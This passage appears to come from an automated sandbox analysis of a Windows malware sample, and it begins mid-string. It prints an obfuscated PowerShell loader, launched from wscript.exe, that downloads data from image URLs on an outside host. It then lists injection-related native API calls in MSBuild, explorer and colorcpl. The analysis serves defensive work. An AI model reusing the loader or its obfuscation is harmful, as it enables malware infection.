reZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041A350 NtCreateFile,5_2_0041A350
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041A400 NtReadFile,5_2_0041A400
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041A480 NtClose,5_2_0041A480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041A530 NtAllocateVirtualMemory,5_2_0041A530
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041A47A NtClose,5_2_0041A47A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2B60 NtClose,LdrInitializeThunk,5_2_013C2B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_013C2BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2AD0 NtReadFile,LdrInitializeThunk,5_2_013C2AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_013C2D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_013C2D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_013C2DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2DD0 NtDelayExecution,LdrInitializeThunk,5_2_013C2DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_013C2C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_013C2CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2F30 NtCreateSection,LdrInitializeThunk,5_2_013C2F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2FB0 NtResumeThread,LdrInitializeThunk,5_2_013C2FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2F90 NtProtectVirtualMemory,LdrInitializeThunk,5_2_013C2F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2FE0 NtCreateFile,LdrInitializeThunk,5_2_013C2FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_013C2EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_013C2E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C3010 NtOpenDirectoryObject,5_2_013C3010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C3090 NtSetValueKey,5_2_013C3090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C4340 NtSetContextThread,5_2_013C4340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C35C0 NtCreateMutant,5_2_013C35C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C4650 NtSuspendThread,5_2_013C4650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C39B0 NtGetContextThread,5_2_013C39B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2BA0 NtEnumerateValueKey,5_2_013C2BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2B80 NtQueryInformationFile,5_2_013C2B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2BE0 NtQueryValueKey,5_2_013C2BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2AB0 NtWaitForSingleObject,5_2_013C2AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2AF0 NtWriteFile,5_2_013C2AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C3D10 NtOpenProcessToken,5_2_013C3D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2D00 NtSetInformationFile,5_2_013C2D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C3D70 NtOpenThread,5_2_013C3D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2DB0 NtEnumerateKey,5_2_013C2DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2C00 NtQueryInformationProcess,5_2_013C2C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2C60 NtCreateKey,5_2_013C2C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2CF0 NtOpenProcess,5_2_013C2CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2CC0 NtQueryVirtualMemory,5_2_013C2CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2F60 NtCreateProcessEx,5_2_013C2F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2FA0 NtQuerySection,5_2_013C2FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2E30 NtWriteVirtualMemory,5_2_013C2E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C2EE0 NtQueueApcThread,5_2_013C2EE0
            Source: C:\Windows\explorer.exeCode function: 6_2_0B412E12 NtProtectVirtualMemory,6_2_0B412E12
            Source: C:\Windows\explorer.exeCode function: 6_2_0B411232 NtCreateFile,NtReadFile,6_2_0B411232
            Source: C:\Windows\explorer.exeCode function: 6_2_0B412E0A NtProtectVirtualMemory,6_2_0B412E0A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051535C0 NtCreateMutant,LdrInitializeThunk,8_2_051535C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152D10 NtMapViewOfSection,LdrInitializeThunk,8_2_05152D10
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152D00 NtSetInformationFile,LdrInitializeThunk,8_2_05152D00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152DD0 NtDelayExecution,LdrInitializeThunk,8_2_05152DD0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_05152DF0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_05152C70
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152C60 NtCreateKey,LdrInitializeThunk,8_2_05152C60
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_05152CA0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152F30 NtCreateSection,LdrInitializeThunk,8_2_05152F30
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152FE0 NtCreateFile,LdrInitializeThunk,8_2_05152FE0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_05152EA0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152B60 NtClose,LdrInitializeThunk,8_2_05152B60
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_05152BA0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_05152BF0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152BE0 NtQueryValueKey,LdrInitializeThunk,8_2_05152BE0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152AD0 NtReadFile,LdrInitializeThunk,8_2_05152AD0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152AF0 NtWriteFile,LdrInitializeThunk,8_2_05152AF0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05154650 NtSuspendThread,8_2_05154650
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05153010 NtOpenDirectoryObject,8_2_05153010
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05153090 NtSetValueKey,8_2_05153090
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05154340 NtSetContextThread,8_2_05154340
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05153D10 NtOpenProcessToken,8_2_05153D10
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152D30 NtUnmapViewOfSection,8_2_05152D30
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05153D70 NtOpenThread,8_2_05153D70
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152DB0 NtEnumerateKey,8_2_05152DB0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152C00 NtQueryInformationProcess,8_2_05152C00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152CC0 NtQueryVirtualMemory,8_2_05152CC0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152CF0 NtOpenProcess,8_2_05152CF0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152F60 NtCreateProcessEx,8_2_05152F60
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152F90 NtProtectVirtualMemory,8_2_05152F90
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152FB0 NtResumeThread,8_2_05152FB0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152FA0 NtQuerySection,8_2_05152FA0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152E30 NtWriteVirtualMemory,8_2_05152E30
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152E80 NtReadVirtualMemory,8_2_05152E80
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152EE0 NtQueueApcThread,8_2_05152EE0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051539B0 NtGetContextThread,8_2_051539B0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152B80 NtQueryInformationFile,8_2_05152B80
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05152AB0 NtWaitForSingleObject,8_2_05152AB0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02F4A350 NtCreateFile,8_2_02F4A350
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02F4A480 NtClose,8_2_02F4A480
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02F4A400 NtReadFile,8_2_02F4A400
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02F4A530 NtAllocateVirtualMemory,8_2_02F4A530
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02F4A47A NtClose,8_2_02F4A47A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_004010305_2_00401030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041D9EC5_2_0041D9EC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041DB1E5_2_0041DB1E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00402D905_2_00402D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00409E505_2_00409E50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041DED45_2_0041DED4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0041DE885_2_0041DE88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00402FB05_2_00402FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014181585_2_01418158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0145B16B5_2_0145B16B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013801005_2_01380100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137F1725_2_0137F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013C516C5_2_013C516C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0142A1185_2_0142A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014481CC5_2_014481CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0139B1B05_2_0139B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014501AA5_2_014501AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0143F0CC5_2_0143F0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144F0E05_2_0144F0E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014470E95_2_014470E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013970C05_2_013970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144A3525_2_0144A352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144132D5_2_0144132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0137D34C5_2_0137D34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014503E65_2_014503E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013D739A5_2_013D739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0139E3F05_2_0139E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014302745_2_01430274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013952A05_2_013952A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014312ED5_2_014312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AD2F05_2_013AD2F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AB2C05_2_013AB2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013905355_2_01390535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014475715_2_01447571
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014505915_2_01450591
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0142D5B05_2_0142D5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014424465_2_01442446
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013814605_2_01381460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144F43F5_2_0144F43F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0143E4F65_2_0143E4F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013907705_2_01390770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B47505_2_013B4750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144F7B05_2_0144F7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138C7C05_2_0138C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_014416CC5_2_014416CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AC6E05_2_013AC6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A69625_2_013A6962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013999505_2_01399950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AB9505_2_013AB950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013929A05_2_013929A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0145A9A65_2_0145A9A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013FD8005_2_013FD800
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0139A8405_2_0139A840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013928405_2_01392840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013768B85_2_013768B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013BE8F05_2_013BE8F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013938E05_2_013938E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144AB405_2_0144AB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144FB765_2_0144FB76
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01446BD75_2_01446BD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01405BF05_2_01405BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AFB805_2_013AFB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013CDBF95_2_013CDBF9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01447A465_2_01447A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144FA495_2_0144FA49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01403A6C5_2_01403A6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0143DAC65_2_0143DAC6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013D5AA05_2_013D5AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138EA805_2_0138EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0142DAAC5_2_0142DAAC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01441D5A5_2_01441D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01447D735_2_01447D73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0139AD005_2_0139AD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01393D405_2_01393D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A8DBF5_2_013A8DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0138ADE05_2_0138ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013AFDC05_2_013AFDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01390C005_2_01390C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01409C325_2_01409C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144FCF25_2_0144FCF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01380CF25_2_01380CF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01430CB55_2_01430CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01404F405_2_01404F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013B0F305_2_013B0F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013D2F285_2_013D2F28
